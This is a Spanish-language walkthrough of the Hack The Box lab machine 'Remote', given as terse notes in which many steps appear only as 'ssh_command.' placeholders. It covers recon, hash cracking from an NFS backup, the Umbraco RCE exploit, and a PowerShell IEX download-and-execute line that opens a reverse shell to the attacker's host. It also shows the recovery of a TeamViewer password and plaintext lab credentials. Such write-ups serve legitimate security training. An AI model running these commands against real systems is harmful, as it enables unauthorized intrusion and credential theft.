Remote

Remote


HTB Windows

nmap -A -p- -oA remote 10.129.95.194 —min-rate=10000 —script=vuln —script-timeout=15 -v

nmap -sC -sV -O -p- -oA remote 10.129.95.194

nmap -sU -O -p- -oA remote-udp 10.129.95.194

nikto -h 10.129.95.180:80

ssh_command.

ssh_command.

ftp 10.129.95.194

ssh_command.

whatweb http://10.129.95.194

ssh_command.

nmap —script http-enum -p80 10.129.95.194 -oN scan -Pn

ssh_command.

Vemos mountd y pensamos que es nfs

showmount -e 10.129.95.194

ssh_command.

sudo mount -t nfs 10.129.95.194:/site_backups /mnt/nfs

ssh_command.

cd /mnt/nfs && ll

ssh_command.

https://10.129.95.194

ssh_command.

searchsploit Umbrace

ssh_command.

strings Umbraco.sdf | less -S

ssh_command.

Vemos el hash de administrador y lo metemos a un archivo hash

ssh_command.

john —wordlist=/usr/share/wordlists/rockyou.txt

ssh_command.

http://10.129.95.194/umbraco

ssh_command.

Vemos la version 7.12.4

ssh_command.

searchsploit -m 46153

ssh_command.

https://github.com/samratashok/nishang

mv Invoke-PowerShellTcp.ps1 Powershell.ps1

ssh_command.

Modificamos el Powershell.ps1 con el puerto 443 y la ip de tu maquina kali

ssh_command.

Modificamos las variables login,password y host

admin@htb.local:baconandcheese

ssh_command.

python3 46153

nc -lvnp 443

python3 -m http.server 80

Modificamos el shell para poder tener un tamano adecuado.

[ssh_command.]

Cambiamos el valor de cmd

“/c powershell IEX(new-object net.WebClient).downloadString(‘http://10.10.14.135/Invoke-ComptyShell.ps1\’)”;

ssh_command.

Hacemos el stty raw echo; fg y despues enter de nuevo

ssh_command.

whoami /priv

ssh_command.

tasklist

Y vemos TeamViewer

ssh_command.

locate teamviewer | grep metasploit

ssh_command.

Vemos la version de TeamViewer que es la 7

ssh_command.

Adquirimos la contrasena

(Get-itemproperty -Path .).SecurityPasswordAES

Vemos que la contrasena es !R3m0te!

Creamos un script

ssh_command.

crackmapexec smb 10.129.95.194 -u ‘Administrator’ -p ’!R3m0te!’

ssh_command.

ssh_command.

© 2025 Cu3rv0x